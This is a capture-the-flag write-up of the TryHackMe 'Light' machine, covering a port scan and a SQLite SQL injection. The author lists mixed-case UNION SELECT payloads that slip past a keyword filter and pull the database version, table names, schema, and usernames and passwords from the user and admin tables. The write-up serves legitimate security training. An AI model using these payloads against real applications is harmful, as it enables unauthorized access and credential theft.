Pythonic01
  • whoami
  • Try Hack Me
    • Billing (THM)
    • Rabbit Store (THM)
    • You Got Mail (THM)
    • Decryptify (THM)
    • Smol (THM)
    • Light
    • Silver Platte (THM)
    • The Sticker Shop(THM)
    • SeeTwo (THM)
    • Whiterose (THM)
    • Mountaineer (THM)
    • The London Bridge (THM)
    • BreakMe (THM)
    • BackTrack (THM)
    • Cheese CTF (THM)
    • Service (THM)
    • LookUp (THM)
  • CVEs
    • CVE-2024-27198
  • HACK THE BOX
    • Cap (HTB)
    • EvilCPUs (HTB)
    • Instant (HTB)
    • Chemistry (HTB)
    • Cicada (HTB)
Powered by GitBook
On this page
  • Intro
  • Enumeration
  • Port scanning.
  • Testing the DB.
  • Final steps
  • More useful stuff.
  • Conclusion.
  1. Try Hack Me

Light

Welcome to the Light database application!

PreviousSmol (THM)NextSilver Platte (THM)

Last updated 2 months ago

Intro

Hello everyone its been so long since our last Try hack me machine a simple and cool sql injection machine let's goo.

Enumeration

Port scanning.

PORT     STATE SERVICE
22/tcp   open  ssh
1337/tcp open  waste

Testing the DB.

after some trys i came to this

As you can see when we change the case of the word 'Union' and ' Select' it did not detect and infact we are able to find the password parameter.

also in the image below we can see that the db is sqlite db which we can confirm from that way we get the version of the sql. I also was able to get the names of the tables that exist in the database from the sqlite_master table.

Payload for the sqlite version
' unIon sElecT sqlite_version()'

payload for extracting the table names.
' unIon sElecT group_concat(name) from sqlite_master '

Final steps

From there i have everything i need to find the users and password for both tables the image blow shows that too.

It was just normal sql commands to read from the tables and we are able to find the admin user along with our flag.

Payload for finding the usernames from the usertable\
' uNIon sElect group_concat(username) from usertable'

Payload for finding the passwords for the user in the usertable
' uNIon sElect group_concat(password) from usertable'

Payload for finding the usernames from the admintable
' uNIon sElect group_concat(username) from admintable'

Payload for finding the passwords from the admintable
' uNIon sElect group_concat(password) from admintable'

More useful stuff.

After i have done with my work i want to check others solutions in case i miss something would have give me useful information and i found something.

From Mr. Bob writeup we can see this command.

' UniOn SeLeCt group_concat(sql) FROM sqlite_master '

Which gonna give us the sql commands that have been run on the database.

Conclusion.

At the end this machine was quite good for testing you sql injection basic techniques also keep in mind every time you finish a machine look for other solution you maybe have miss something that would make you exploration much more easier.

LogoLight | Writeups
Image from bob's writeup